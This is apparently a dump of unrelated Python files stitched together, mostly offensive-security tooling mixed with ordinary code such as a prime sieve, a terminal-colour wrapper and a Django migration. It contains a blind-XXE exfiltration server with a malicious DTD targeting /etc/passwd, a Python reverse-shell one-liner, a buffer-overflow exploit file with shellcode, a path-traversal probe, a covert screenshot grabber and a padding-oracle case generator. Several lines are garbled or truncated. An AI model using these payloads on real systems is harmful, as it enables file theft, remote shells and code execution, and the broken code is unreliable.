print(urllib.unquote(data).decode('utf8')) print('-' * 30 + '\n') self.response(body='true') EXFILTRATED_EVENT.set() elif request.path.endswith('.dtd'): dbg('Sending malicious DTD file.') dtd = '''<!ENTITY %% param_exfil SYSTEM "%(exfil_file)s"> <!ENTITY %% param_request "<!ENTITY exfil SYSTEM 'http://%(exfil_host)s:%(exfil_port)d/?exfil=%%param_exfil;'>"> %%param_request;''' % { 'exfil_file' : config['exfil-file'], 'exfil_host' : config['rhost'], 'exfil_port' : config['port'] } self.response(content_type='text/xml', body=dtd) else: dbg('%s %s' % (request.command, request.path)) self.response(body='false') def parseOptions(argv): global config print(''' :: Blind-XXE attacker's helper backend component Helps exfiltrate files by abusing out-of-bands XML External Entity vulnerabilities. Mariusz Banach / mgeeky '16-18, <> ''') parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>') parser.add_argument('file', type=str, metavar='FILE', default='file:///etc/passwd', help = 'Specifies file to exfiltrate using Blind XXE technique.') parser.add_argument('-l', '--listen', default='', help = 'Specifies interface address to bind the HTTP server on / listen on. Default: (all interfaces)') parser.add_argument('-p', '--port', metavar='PORT', default='8080', type=int, help='Specifies the port to listen on. Default: 8080') parser.add_argument('-r', '--rhost', metavar='HOST', default=config['rhost'], help='Specifies attackers host address where the victim\'s XML parser should refer while fetching external entities') parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.') args = parser.parse_args() config['debug'] = args.debug config['listen'] = args.listen config['port'] = int(args.port) config['rhost'] = args.rhost config['exfil-file'] = args.file print('[::] File to be exfiltrated: "{}"'.format(args.file)) port = int(args.port) if port < 1 or port > 65535: Logger.err("Invalid port number. Must be in <1, 65535>") sys.exit(-1) return args def fetchRhost(): global config config['rhost'] = socket.gethostbyname(socket.gethostname()) def main(argv): global config fetchRhost() opts = parseOptions(argv) if not opts: Logger.err('Options parsing failed.') return False print('[+] Serving HTTP server on: ("{}", {})'.format( config['listen'], config['port'] )) dbg('RHOST set to: {}'.format(config['rhost'])) rhost = config['listen'] if config['listen'] == '': rhost = config['rhost'] print('\n[>] Here, use the following XML to leverage Blind XXE vulnerability:') print(''' === <?xml version="1.0"?> <!DOCTYPE foo SYSTEM "http://{}:{}/test.dtd"> <foo>&exfil;</foo> === PS: Don't forget to set: Content-Type: text/xml '''.format(rhost, config['port'])) server = HTTPServer((config['listen'], config['port']), BlindXXEServer) thread = threading.Thread(target=server.serve_forever) thread.daemon = True thread.start() while not EXFILTRATED_EVENT.is_set(): pass print('[+] File has been exfiltrated. Quitting.') if __name__ == '__main__': main(sys.argv)
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Author : jeffzhang # @Time : 18-5-14 # @File : # @Desc : =_=!! import sched import time import datetime from multiprocessing import Pool, Lock from threading import RLock from pocsuite.api.cannon import Cannon from apscheduler.schedulers.blocking import BlockingScheduler from bson.objectid import ObjectId from fuxi.views.lib.mongo_db import connectiondb, db_name_conf from fuxi.views.lib.parse_target import parse_target from instance import config_name config_db = db_name_conf()['config_db'] tasks_db = db_name_conf()['tasks_db'] vul_db = db_name_conf()['vul_db'] plugin_db = db_name_conf()['plugin_db'] schedule = sched.scheduler(time.time, time.sleep) lock = Lock() thread_lock = RLock() def verify_poc(scan_data): plugin_name = scan_data['plugin_name'] plugin_filename = scan_data['plugin_filename'] target = scan_data['target'] info = {"pocname": plugin_name, "pocstring": open(plugin_filename, 'r').read(), "mode": 'verify' } try: invoker = Cannon(target, info) result = if result[-3][0] == 1: scan_result = { "plugin_filename": scan_data['plugin_filename'], "plugin_name": scan_data['plugin_name'], "plugin_id": scan_data['plugin_id'], "plugin_type": scan_data['plugin_type'], "plugin_app": scan_data['plugin_app'], "plugin_version": scan_data['plugin_version'], "target": scan_data['target'], "task_id": scan_data['task_id'], "task_name": scan_data['task_name'], "scan_result": result[-1], "date": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), "tag": "" } connectiondb(vul_db).insert(scan_result) except Exception as e: raise e class PocsuiteScanner: def __init__(self, task_id): self.task_id = task_id self.tasks_db_cursor = connectiondb(tasks_db).find_one({"_id": self.task_id}) self.target_list = parse_target(self.tasks_db_cursor['scan_target']) self.plugin_id_list = self.tasks_db_cursor['plugin_id'] self.result_tmp = [] self.result = [] self.processes = connectiondb(config_db).find_one({"config_name": config_name})['poc_thread'] def set_scanner(self): connectiondb(tasks_db).update_one({'_id': ObjectId(self.task_id)}, {'$set': {'task_status': 'Processing'}}) if connectiondb(vul_db).find_one({"task_id": self.task_id}): connectiondb(vul_db).update({'task_id': self.task_id}, {"$set": {"tag": "delete"}}, multi=True) pool_scanner = Pool(processes=self.processes) for target in self.target_list: for plugin_id in self.plugin_id_list: plugin_cursor = connectiondb(plugin_db).find_one({"_id": ObjectId(plugin_id)}) scan_data = { "plugin_filename": plugin_cursor['plugin_filename'].encode("UTF-8"), "plugin_name": plugin_cursor['plugin_name'].encode("UTF-8"), "plugin_id": plugin_cursor['_id'], "plugin_type": plugin_cursor['plugin_type'], "plugin_app": plugin_cursor['plugin_app'], "plugin_version": plugin_cursor['plugin_version'], "target": target, "task_id": self.task_id, "task_name": self.tasks_db_cursor['task_name'], } pool_scanner.apply_async(verify_poc, (scan_data,)) pool_scanner.close() pool_scanner.join() connectiondb(tasks_db).update_one({'_id': ObjectId(self.task_id)}, { '$set': { 'task_status': 'Completed', 'end_date': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()) } }) class PoCScannerLoop: def __init__(self): self.recursion = '' self.status = '' self.task_id = '' self.end_date = '' def task_schedule(self): scheduler = BlockingScheduler() try: scheduler.add_job(self._get_task, 'interval', seconds=30) scheduler.start() except Exception as e: print(e) def _get_task(self): # while thread_lock: for task_info in connectiondb(tasks_db).find(): self.recursion = int(task_info['task_recursion']) self.task_id = task_info['_id'] self.status = task_info['task_status'] self.end_date = task_info['end_date'] if self.recursion == 0: pass # every day task if self.recursion == 1: if "Processing" in self.status: pass else: start_date = datetime.datetime.strptime(self.end_date, "%Y-%m-%d %H:%M:%S") plan_time = ( - start_date).total_seconds() if plan_time > 60 * 60 * 24: print("Every day recursion start......") scanner = PocsuiteScanner(self.task_id) scanner.set_scanner() # every week task elif self.recursion == 7: if "Processing" in self.status: pass else: start_date = datetime.datetime.strptime(self.end_date, "%Y-%m-%d %H:%M:%S") plan_time = ( - start_date).total_seconds() if plan_time > 60 * 60 * 24 * 7: print("Every week start...") scanner = PocsuiteScanner(self.task_id) scanner.set_scanner() # every month task elif self.recursion == 30: if "Processing" in self.status: pass else: start_date = datetime.datetime.strptime(self.end_date, "%Y-%m-%d %H:%M:%S") plan_time = ( - start_date).total_seconds() if plan_time > 60 * 60 * 24 * 30: print("Every month start...") scanner = PocsuiteScanner(self.task_id) scanner.set_scanner() if __name__ == '__main__': loop_scanner = PoCScannerLoop()
# Reverse shell one-liner python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'
#!/usr/bin/python # -*- coding: utf-8 -*- from scapy.all import * interface = 'mon0' probeReqs = [] def sniffProbe(p): if p.haslayer(Dot11ProbeReq): netName = p.getlayer(Dot11ProbeReq).info if netName not in probeReqs: probeReqs.append(netName) print '[+] Detected New Probe Request: ' + netName sniff(iface=interface, prn=sniffProbe)
import os import collections import platform import socket, subprocess,sys import threading from datetime import datetime ''' section 1 ''' net = raw_input("Enter the Network Address ") net1= net.split('.') a = '.' net2 = net1[0]+a+net1[1]+a+net1[2]+a st1 = int(raw_input("Enter the Starting Number ")) en1 = int(raw_input("Enter the Last Number ")) en1 =en1+1 dic = collections.OrderedDict() #dic = collections.OrderedDict() oper = platform.system() if (oper=="Windows"): ping1 = "ping -n 1 " elif (oper== "Linux"): ping1 = "ping -c 1 " else : ping1 = "ping -c 1 " t1= '''section 2''' class myThread (threading.Thread): def __init__(self,st,en): threading.Thread.__init__(self) = st self.en = en def run(self): run1(,self.en) '''section 3''' def run1(st1,en1): #print "Scanning in Progess" for ip in xrange(st1,en1): #print ".", addr = net2+str(ip) comm = ping1+addr response = os.popen(comm) for line in response.readlines(): if(line.count("TTL")): break if (line.count("TTL")): #print addr, "--> Live" dic[ip]= addr ''' Section 4 ''' total_ip =en1-st1 tn =20 # number of ip handled by one thread total_thread = total_ip/tn total_thread=total_thread+1 threads= [] try: for i in xrange(total_thread): en = st1+tn if(en >en1): en =en1 thread = myThread(st1,en) thread.start() threads.append(thread) st1 =en except: print "Error: unable to start thread" print "\tNumber of Threads active:", threading.activeCount() for t in threads: t.join() print "Exiting Main Thread" dict = collections.OrderedDict(sorted(dic.items())) for key in dict: print dict[key],"-->" "Live" t2= total =t2-t1 print "scanning complete in " , total
''' Suggestion: Use py2exe to turn this script into a Windows executable. Example: python py2exe Run as administrator to store file under current path. Change pathname if administrator level privilege is not possible. Ways to improve program: * Compress files to reduce size. ''' import win32gui import win32ui import win32con import win32api import time import itertools def win_screenshot_taker(): while True: for i in itertools.count(): # Grab a handle to the main desktop window fg_window = win32gui.GetDesktopWindow() # Determine the size of all monitors in pixels width = win32api.GetSystemMetrics(win32con.SM_CXVIRTUALSCREEN) height = win32api.GetSystemMetrics(win32con.SM_CYVIRTUALSCREEN) left = win32api.GetSystemMetrics(win32con.SM_XVIRTUALSCREEN) top = win32api.GetSystemMetrics(win32con.SM_YVIRTUALSCREEN) # Create a device context desktop_dc = win32gui.GetWindowDC(fg_window) img_dc = win32ui.CreateDCFromHandle(desktop_dc) # Create a memory-based device context mem_dc = img_dc.CreateCompatibleDC() # Create a bitmap object screenshot = win32ui.CreateBitmap() screenshot.CreateCompatibleBitmap(img_dc, width, height) mem_dc.SelectObject(screenshot) # Copy the screen into our memory device context mem_dc.BitBlt((0, 0), (width, height), img_dc, (left, top), win32con.SRCCOPY) # Save the bitmap to a file screenshot.SaveBitmapFile(mem_dc, "c:\\WINDOWS\\Temp\\screenshot{}.bmp".format(i)) # Free our objects mem_dc.DeleteDC() win32gui.DeleteObject(screenshot.GetHandle()) time.sleep(3) win_screenshot_taker()
""" ACTIVE Plugin for Testing for Web Application Fingerprint (OWASP-IG-004) """ from owtf.managers.resource import get_resources from owtf.plugin.helper import plugin_helper DESCRIPTION = "Active probing for fingerprint analysis" def run(PluginInfo): resource = get_resources("ActiveFingerPrint") Content = plugin_helper.CommandDump( "Test Command", "Output", resource, PluginInfo, [] ) # No previous output return Content
# Prime Number Sieve # (BSD Licensed) import math def isPrime(num): # Returns True if num is a prime number, otherwise False. # Note: Generally, isPrime() is slower than primeSieve(). # all numbers less than 2 are not prime if num < 2: return False # see if num is divisible by any number up to the square root of num for i in range(2, int(math.sqrt(num)) + 1): if num % i == 0: return False return True def primeSieve(sieveSize): # Returns a list of prime numbers calculated using # the Sieve of Eratosthenes algorithm. sieve = [True] * sieveSize sieve[0] = False # zero and one are not prime numbers sieve[1] = False # create the sieve for i in range(2, int(math.sqrt(sieveSize)) + 1): pointer = i * 2 while pointer < sieveSize: sieve[pointer] = False pointer += i # compile the list of primes primes = [] for i in range(sieveSize): if sieve[i] == True: primes.append(i) return primes
import socket import struct from datetime import datetime s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8) dict = {} file_txt = open("dos.txt",'a') file_txt.writelines("**********") t1= str( file_txt.writelines(t1) file_txt.writelines("**********") file_txt.writelines("\n") print "Detection Start ......." D_val =10 D_val1 = D_val+10 while True: pkt = s.recvfrom(2048) ipheader = pkt[0][14:34] ip_hdr = struct.unpack("!8sB3s4s4s",ipheader) IP = socket.inet_ntoa(ip_hdr[3]) print "Source IP", IP if dict.has_key(IP): dict[IP]=dict[IP]+1 print dict[IP] if(dict[IP]>D_val) and (dict[IP]<D_val1) : line = "DDOS Detected " file_txt.writelines(line) file_txt.writelines(IP) file_txt.writelines("\n") else: dict[IP]=1
# Copyright Jonathan Hartley 2013. BSD 3-Clause license, see LICENSE file. import re import sys import os from .ansi import AnsiFore, AnsiBack, AnsiStyle, Style from .winterm import WinTerm, WinColor, WinStyle from .win32 import windll, winapi_test winterm = None if windll is not None: winterm = WinTerm() def is_stream_closed(stream): return not hasattr(stream, 'closed') or stream.closed def is_a_tty(stream): return hasattr(stream, 'isatty') and stream.isatty() class StreamWrapper(object): ''' Wraps a stream (such as stdout), acting as a transparent proxy for all attribute access apart from method 'write()', which is delegated to our Converter instance. ''' def __init__(self, wrapped, converter): # double-underscore everything to prevent clashes with names of # attributes on the wrapped stream object. self.__wrapped = wrapped self.__convertor = converter def __getattr__(self, name): return getattr(self.__wrapped, name) def write(self, text): self.__convertor.write(text) class AnsiToWin32(object): ''' Implements a 'write()' method which, on Windows, will strip ANSI character sequences from the text, and if outputting to a tty, will convert them into win32 function calls. ''' ANSI_CSI_RE = re.compile('\001?\033\[((?:\d|;)*)([a-zA-Z])\002?') # Control Sequence Introducer ANSI_OSC_RE = re.compile('\001?\033\]((?:.|;)*?)(\x07)\002?') # Operating System Command def __init__(self, wrapped, convert=None, strip=None, autoreset=False): # The wrapped stream (normally sys.stdout or sys.stderr) self.wrapped = wrapped # should we reset colors to defaults after every .write() self.autoreset = autoreset # create the proxy wrapping our output stream = StreamWrapper(wrapped, self) on_windows = == 'nt' # We test if the WinAPI works, because even if we are on Windows # we may be using a terminal that doesn't support the WinAPI # (e.g. Cygwin Terminal). In this case it's up to the terminal # to support the ANSI codes. conversion_supported = on_windows and winapi_test() # should we strip ANSI sequences from our output? if strip is None: strip = conversion_supported or (not is_stream_closed(wrapped) and not is_a_tty(wrapped)) self.strip = strip # should we should convert ANSI sequences into win32 calls? if convert is None: convert = conversion_supported and not is_stream_closed(wrapped) and is_a_tty(wrapped) self.convert = convert # dict of ansi codes to win32 functions and parameters self.win32_calls = self.get_win32_calls() # are we wrapping stderr? self.on_stderr = self.wrapped is sys.stderr def should_wrap(self): ''' True if this class is actually needed. If false, then the output stream will not be affected, nor will win32 calls be issued, so wrapping stdout is not actually required. This will generally be False on non-Windows platforms, unless optional functionality like autoreset has been requested using kwargs to init() ''' return self.convert or self.strip or self.autoreset def get_win32_calls(self): if self.convert and winterm: return { AnsiStyle.RESET_ALL: (winterm.reset_all, ), AnsiStyle.BRIGHT: (, WinStyle.BRIGHT), AnsiStyle.DIM: (, WinStyle.NORMAL), AnsiStyle.NORMAL: (, WinStyle.NORMAL), AnsiFore.BLACK: (winterm.fore, WinColor.BLACK), AnsiFore.RED: (winterm.fore, WinColor.RED), AnsiFore.GREEN: (winterm.fore, WinColor.GREEN), AnsiFore.YELLOW: (winterm.fore, WinColor.YELLOW), AnsiFore.BLUE: (winterm.fore, WinColor.BLUE), AnsiFore.MAGENTA: (winterm.fore, WinColor.MAGENTA), AnsiFore.CYAN: (winterm.fore, WinColor.CYAN), AnsiFore.WHITE: (winterm.fore, WinColor.GREY), AnsiFore.RESET: (winterm.fore, ), AnsiFore.LIGHTBLACK_EX: (winterm.fore, WinColor.BLACK, True), AnsiFore.LIGHTRED_EX: (winterm.fore, WinColor.RED, True), AnsiFore.LIGHTGREEN_EX: (winterm.fore, WinColor.GREEN, True), AnsiFore.LIGHTYELLOW_EX: (winterm.fore, WinColor.YELLOW, True), AnsiFore.LIGHTBLUE_EX: (winterm.fore, WinColor.BLUE, True), AnsiFore.LIGHTMAGENTA_EX: (winterm.fore, WinColor.MAGENTA, True), AnsiFore.LIGHTCYAN_EX: (winterm.fore, WinColor.CYAN, True), AnsiFore.LIGHTWHITE_EX: (winterm.fore, WinColor.GREY, True), AnsiBack.BLACK: (winterm.back, WinColor.BLACK), AnsiBack.RED: (winterm.back, WinColor.RED), AnsiBack.GREEN: (winterm.back, WinColor.GREEN), AnsiBack.YELLOW: (winterm.back, WinColor.YELLOW), AnsiBack.BLUE: (winterm.back, WinColor.BLUE), AnsiBack.MAGENTA: (winterm.back, WinColor.MAGENTA), AnsiBack.CYAN: (winterm.back, WinColor.CYAN), AnsiBack.WHITE: (winterm.back, WinColor.GREY), AnsiBack.RESET: (winterm.back, ), AnsiBack.LIGHTBLACK_EX: (winterm.back, WinColor.BLACK, True), AnsiBack.LIGHTRED_EX: (winterm.back, WinColor.RED, True), AnsiBack.LIGHTGREEN_EX: (winterm.back, WinColor.GREEN, True), AnsiBack.LIGHTYELLOW_EX: (winterm.back, WinColor.YELLOW, True), AnsiBack.LIGHTBLUE_EX: (winterm.back, WinColor.BLUE, True), AnsiBack.LIGHTMAGENTA_EX: (winterm.back, WinColor.MAGENTA, True), AnsiBack.LIGHTCYAN_EX: (winterm.back, WinColor.CYAN, True), AnsiBack.LIGHTWHITE_EX: (winterm.back, WinColor.GREY, True), } return dict() def write(self, text): if self.strip or self.convert: self.write_and_convert(text) else: self.wrapped.write(text) self.wrapped.flush() if self.autoreset: self.reset_all() def reset_all(self): if self.convert: self.call_win32('m', (0,)) elif not self.strip and not is_stream_closed(self.wrapped): self.wrapped.write(Style.RESET_ALL) def write_and_convert(self, text): ''' Write the given text to our wrapped stream, stripping any ANSI sequences from the text, and optionally converting them into win32 calls. ''' cursor = 0 text = self.convert_osc(text) for match in self.ANSI_CSI_RE.finditer(text): start, end = match.span() self.write_plain_text(text, cursor, start) self.convert_ansi(*match.groups()) cursor = end self.write_plain_text(text, cursor, len(text)) def write_plain_text(self, text, start, end): if start < end: self.wrapped.write(text[start:end]) self.wrapped.flush() def convert_ansi(self, paramstring, command): if self.convert: params = self.extract_params(command, paramstring) self.call_win32(command, params) def extract_params(self, command, paramstring): if command in 'Hf': params = tuple(int(p) if len(p) != 0 else 1 for p in paramstring.split(';')) while len(params) < 2: # defaults: params = params + (1,) else: params = tuple(int(p) for p in paramstring.split(';') if len(p) != 0) if len(params) == 0: # defaults: if command in 'JKm': params = (0,) elif command in 'ABCD': params = (1,) return params def call_win32(self, command, params): if command == 'm': for param in params: if param in self.win32_calls: func_args = self.win32_calls[param] func = func_args[0] args = func_args[1:] kwargs = dict(on_stderr=self.on_stderr) func(*args, **kwargs) elif command in 'J': winterm.erase_screen(params[0], on_stderr=self.on_stderr) elif command in 'K': winterm.erase_line(params[0], on_stderr=self.on_stderr) elif command in 'Hf': # cursor position - absolute winterm.set_cursor_position(params, on_stderr=self.on_stderr) elif command in 'ABCD': # cursor position - relative n = params[0] # A - up, B - down, C - forward, D - back x, y = {'A': (0, -n), 'B': (0, n), 'C': (n, 0), 'D': (-n, 0)}[command] winterm.cursor_adjust(x, y, on_stderr=self.on_stderr) def convert_osc(self, text): for match in self.ANSI_OSC_RE.finditer(text): start, end = match.span() text = text[:start] + text[end:] paramstring, command = match.groups() if command in '\x07': # \x07 = BEL params = paramstring.split(";") # 0 - change title and icon (we will only change title) # 1 - change icon (we don't support this) # 2 - change title if params[0] in '02': winterm.set_title(params[1]) return text
#! /usr/bin/python3.5 def method_1(*args): print("------------------------") print("Method_1 -") print("Recievied : " +str(args)) sum=0 for arg in args: sum=sum+arg print ("Sum : " +str(sum)) print("------------------------\n") def method_1_rev(a=0,b=0,c=0,d=0): print("------------------------") print("Method_1_rev") sum= a + b + c + d print ("Sum : " +str(sum)) print("------------------------\n") def method_2(**args): print("------------------------") print("Method 2") print("Recievied : " +str(args)) for k,v in args.items(): print("Key : " +str(k) +",\ Value : "+str(v)) print("------------------------\n") def method_2_rev(k1="first key",k2="second key"): print("------------------------") print("Methid_2_rev") print("Value for K1 : "+str(k1)) print("Value for K2 : "+str(k2)) print("------------------------\n") def execute_all(): method_1(1,2,3,4,5,6,7,8) method_2(k1=22,k2=33) my_list=[1,2,3,4] my_dict={"k1":"Value 1","k2":"Value 2"} method_1_rev(*my_list) method_2_rev(**my_dict) execute_all()
#!/usr/bin/env python ''' Author: Chris Duffy Date: May 2015 Name: Purpose: To provide a means to demonstrate a simple file upload proof of concept related to exploiting Free MP3 CD Ripper. Copyright (c) 2015, Christopher Duffy All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ''' import struct filename="exploit.wav" fill ="A"*4112 #eip = struct.pack('<I',0x42424242) # EIP overwrite verfication eip = struct.pack('<I',0x7C874413) # JMP ESP instruction from Kernel32.dll offset = "\x90"*10 available_shellcode_space = 320 # Place for calc.exe shellcode calc = ("\xba\x86\x2c\x9a\x7b\xd9\xc2\xd9\x74\x24\xf4\x5e\x33\xc9\xb1" "\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\x89\xce\x6f\x87\x7d\x8c" "\x90\x78\x7d\xf1\x19\x9d\x4c\x31\x7d\xd5\xfe\x81\xf5\xbb\xf2" "\x6a\x5b\x28\x81\x1f\x74\x5f\x22\x95\xa2\x6e\xb3\x86\x97\xf1" "\x37\xd5\xcb\xd1\x06\x16\x1e\x13\x4f\x4b\xd3\x41\x18\x07\x46" "\x76\x2d\x5d\x5b\xfd\x7d\x73\xdb\xe2\x35\x72\xca\xb4\x4e\x2d" "\xcc\x37\x83\x45\x45\x20\xc0\x60\x1f\xdb\x32\x1e\x9e\x0d\x0b" "\xdf\x0d\x70\xa4\x12\x4f\xb4\x02\xcd\x3a\xcc\x71\x70\x3d\x0b" "\x08\xae\xc8\x88\xaa\x25\x6a\x75\x4b\xe9\xed\xfe\x47\x46\x79" "\x58\x4b\x59\xae\xd2\x77\xd2\x51\x35\xfe\xa0\x75\x91\x5b\x72" "\x17\x80\x01\xd5\x28\xd2\xea\x8a\x8c\x98\x06\xde\xbc\xc2\x4c" "\x21\x32\x79\x22\x21\x4c\x82\x12\x4a\x7d\x09\xfd\x0d\x82\xd8" "\xba\xe2\xc8\x41\xea\x6a\x95\x13\xaf\xf6\x26\xce\xf3\x0e\xa5" "\xfb\x8b\xf4\xb5\x89\x8e\xb1\x71\x61\xe2\xaa\x17\x85\x51\xca" "\x3d\xe6\x34\x58\xdd\xc7\xd3\xd8\x44\x18") # Place for actual shellcode shell =() #nop = "\x90"*(available_shellcode_space-len(shell)-len(offset)) #exploit = fill + eip + offset + shell + nop exploit = fill + eip + offset + calc #loader for simple proof of concept for shell cdoe #exploit = fill + eip + offset + shell #loader for real shell access open('exploit.wav', 'w').close() writeFile = open (filename, "w") writeFile.write(exploit) writeFile.close()
# -*- coding: utf-8 -*- # Generated by Django 1.9.1 on 2016-01-08 06:50 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('nmaper', '0009_auto_20160108_0613'), ] operations = [ migrations.AlterField( model_name='nmapscan', name='email_text', field=models.CharField(max_length=8), ), migrations.AlterField( model_name='nmapscan', name='status_text', field=models.CharField(choices=[('waiting', 'Waiting'), ('running', 'Running'), ('finished', 'Finished')], max_length=16), ), ]
import requests import sys url = "" payloads = {'etc/passwd': 'root'} up = "../" i = 0 for payload, string in payloads.iteritems(): while i < 7: req =*up)+payload) if string in req.text: print "Parameter vulnerable\r\n" print "Attack string: "+(i*up)+payload+"\r\n" print req.text break i = i+1 i = 0
import urllib url = urllib.urlopen("") data = print data
#!/usr/bin/python # # Padding Oracle test-cases generator. # Mariusz Banach / mgeeky, 2016 # v0.2 # # Simple utility that aids the penetration tester when manually testing Padding Oracle condition # of a target cryptosystem, by generating set of test cases to fed the cryptosystem with. # # Script that takes from input an encoded cipher text, tries to detect applied encoding, decodes the cipher # and then generates all the possible, reasonable cipher text transformations to be used while manually # testing for Padding Oracle condition of cryptosystem. The output of this script will be hundreds of # encoded values to be used in manual application testing approaches, like sending requests. # # One of possible scenarios and ways to use the below script could be the following: # - clone the following repo: # - launch which is an example of application vulnerable to Padding Oracle # - then by using `curl http://localhost:5000/echo?cipher=<ciphertext>` we are going to manually # test for Padding Oracle outcomes. The case of returning something not being a 'decryption error' # result would be considered padding-hit, therefore vulnerability proof. # # This script could be then launched to generate every possible test case of second to the last block # being filled with specially tailored values (like vector of zeros with last byte ranging from 0-255) # and then used in some kind of local http proxy (burp/zap) or http client like (curl/wget). # # Such example usage look like: # #--------------------------------------------- # bash$ x=0 ; for i in $(./ 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308ed2382fb0a54f3a2954bfebe0a04dd4d6); \ # do curl -s http://host:5000/echo?cipher=$i | grep -qv 'error' && printf "Byte: 0x%02x not generated decryption error.\n" $x ; x=$((x+1)); done # # [?] Data resembles block cipher with block size = 16 # [?] Data resembles block cipher with block size = 8 # # Generated in total: 512 test cases for 8, 16 block sizes. # Byte: 0x87 not generated decryption error. #--------------------------------------------- # # There the script took at it's first parameter the hex encoded parameter, used it to feed test cases generator and resulted with 512 # test cases varying with the last byte of the second to the last block: # (...) # 484b850123a04baf15df9be14e87369b000000000000000000000000000000fad2382fb0a54f3a2954bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369b000000000000000000000000000000fbd2382fb0a54f3a2954bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369b000000000000000000000000000000fcd2382fb0a54f3a2954bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369b000000000000000000000000000000fdd2382fb0a54f3a2954bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369b000000000000000000000000000000fed2382fb0a54f3a2954bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369b000000000000000000000000000000ffd2382fb0a54f3a2954bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000054bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000154bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000254bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000354bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000454bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000554bfebe0a04dd4d6 # 484b850123a04baf15df9be14e87369bc59ca16e1f3645ef53cc6a4d9d87308e000000000000000654bfebe0a04dd4d6 # (...) # # At the end, those values were used in for loop to launch for every entry a curl client with request to the Padding Oracle. # The 0x87 byte that was catched was the only one that has not generated a 'decryption error' outcome from the request, resulting # in improperly decrypted plain-text from attacker-controled cipher text. # import re import sys import urllib import binascii as ba import base64 # Flip this variable when your input data is not being properly processed. DEBUG = False def info(txt): sys.stderr.write(txt + '\n') def warning(txt): info('[?] ' + txt) def error(txt): info('[!] ' + txt) def dbg(txt): if DEBUG: info('[dbg] '+txt) # or maybe: # class PaddingOracleTestCasesWithVaryingSecondToTheLastBlockGenerator class PaddingOracleTestCasesGenerator: NONE = 0 B64URL = 1 B64STD = 2 HEXENC = 3 data = '' offset = 0 encoding = NONE blocksizes = set() urlencoded = False def __init__(self, data, blocksize=0): = data len_before = len(data) self.encoding = self.detect_encoding() = self.decode(data) if blocksize != 0: assert blocksize % 8 == 0, "Blocksize must be divisible by 8" self.blocksizes = [blocksize,] else: self.detect_blocksize() self.data_evaluation(len_before) def data_evaluation(self, len_before): def entropy(txt): import math from collections import Counter p, lns = Counter(txt), float(len(txt)) return -sum( count / lns * math.log(count/lns, 2) for count in p.values()) e = entropy( warning('Data size before and after decoding: %d -> %d' % (len_before, len( warning('Data entropy: %.6f' % entropy( if e < 5.0: info('\tData does not look random, not likely to deal with block cipher.') elif e >= 5.0 and e < 7.0: info('\tData only resembles random stream, hardly to be dealing with block cipher.') else: info('\tHigh likelihood of dealing with block cipher. That\'s good.') if self.offset != 0: warning('Data structure not resembles block cipher.') warning('Proceeding with sliding window of %d bytes in the beginning and at the end\n' % self.offset) else: warning('Data resembles block cipher with block size = %d' % max(self.blocksizes)) def detect_encoding(self): b64url = '^[a-zA-Z0-9_\-]+={0,2}$' b64std = '^[a-zA-Z0-9\+\/]+={0,2}$' hexenc1 = '^[0-9a-f]+$' hexenc2 = '^[0-9A-F]+$' data = if'%[0-9a-f]{2}',, re.I) != None: dbg('Sample is url-encoded.') data = urllib.unquote_plus(data) self.urlencoded = True if (re.match(hexenc1, data) or re.match(hexenc2, data)) and len(data) % 2 == 0: dbg('Hex encoding detected.') return self.HEXENC if re.match(b64url, data): dbg('Base64url encoding detected.') return self.B64URL if re.match(b64std, data): dbg('Standard Base64 encoding detected.') return self.B64STD error('Warning: Could not detect data encoding. Going with plain data.') return self.NONE def detect_blocksize(self): sizes = [32, 16, 8] # Correspondigly: 256, 128, 64 bits self.offset = len( % 8 datalen = 